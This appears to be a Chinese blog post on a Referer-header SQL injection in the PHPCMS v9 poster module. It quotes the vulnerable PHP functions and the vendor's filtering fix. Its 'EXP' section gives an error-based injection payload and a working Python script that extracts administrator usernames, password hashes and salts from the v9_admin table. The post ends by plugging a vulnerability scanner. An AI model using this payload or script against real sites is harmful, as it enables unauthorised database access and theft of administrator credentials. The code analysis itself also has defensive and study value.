PHPCMSv9 SQL注入(Rerferer注入)

360报告了该漏洞,地址:http://webscan.360.cn/news/news84,重要部分被打上了马赛克,根据分析漏洞,给出利用方法。
上面说的很详细了,由于poster_click函数在插入数据库的时候,没对http-referer做过滤,然后产生了注入。

    public function poster_click() {
        $id = isset($_GET['id']) ? intval($_GET['id']) : 0;
        $r = $this->db->get_one(array('id'=>$id));
        if (!is_array($r) && empty($r)) return false;
        $ip_area = pc_base::load_sys_class('ip_area');
        $ip = ip();
        $area = $ip_area->get($ip);
        $username = param::get_cookie('username') ? param::get_cookie('username') : '';
        if($id) {
            $siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
            $this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));
        }
        $this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
        $setting = string2array($r['setting']);
        if (count($setting)==1) {
            $url = $setting['1']['linkurl'];
        } else {
            $url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];
        }
        header('Location: '.$url);
    }

 

在show_stat函数中同样出现了问题

    protected function show_stat($siteid = 0, $spaceid = 0, $id = 0) {
        $M = new_html_special_chars(getcache('poster', 'commons'));
        if($M['enablehits']==0) return true; 
        //$siteid = intval($siteid);
        $spaceid = intval($spaceid);
        $id = intval($id);
        if(!$id) return false;
        if(!$siteid || !$spaceid) {
            $r = $this->db->get_one(array('id'=>$id), 'siteid, spaceid');
            $siteid = $r['id'];
            $spaceid = $r['spaceid'];
        }
        $ip = ip();
        $ip_area = pc_base::load_sys_class('ip_area');
        $area = $ip_area->get($ip);
        $username = param::get_cookie('username') ? param::get_cookie('username') : '';
        $this->db->update(array('hits'=>'+=1'), array('id'=>$id));
        $this->s_db->insert(array('pid'=>$id, 'siteid'=>$siteid, 'spaceid'=>$spaceid, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=>0));
        return true;
    }
}

 

不过官方对这2个点都做了修复。
官方修复的方法:
safe_replace(HTTP_REFERER),对其进行了过滤。

function safe_replace($string) {
    $string = str_replace('%20','',$string);
    $string = str_replace('%27','',$string);
    $string = str_replace('%2527','',$string);
    $string = str_replace('*','',$string);
    $string = str_replace('"','"',$string);
    $string = str_replace("'",'',$string);
    $string = str_replace('"','',$string);
    $string = str_replace(';','',$string);
    $string = str_replace('<','&lt;',$string);
    $string = str_replace('>','&gt;',$string);
    $string = str_replace("{",'',$string);
    $string = str_replace('}','',$string);
    $string = str_replace('\\','',$string);
    return $string;
}

 

EXP:
http://site/index.php?m=poster&c=index&a=poster_click&id=1

http://www.paxmac.org’,(SELECT 1 FROM (select count(),concat(floor(rand(0)2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#

python exp代码:

#!/usr/bin/env python
#encoding=utf-8
#code by 花开、若相惜
#PaxMac Team
import urllib2, re
req = urllib2.Request("http://localhost/phpcms_v9_GBK/install_package/index.php?m=poster&c=index&a=poster_click&id=1")
payload = "http://www.paxmac.org',(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),'1')#"
req.add_header( "Referer", payload)
res = urllib2.urlopen( req ) 
html = res.read()
html = re.findall(r"Duplicate entry \'\w+'", html)
if html:
    print "success"
    print html[0]
else:
    print "no sql injection"
res.close() 

 

工具更新:
paxmacvulscan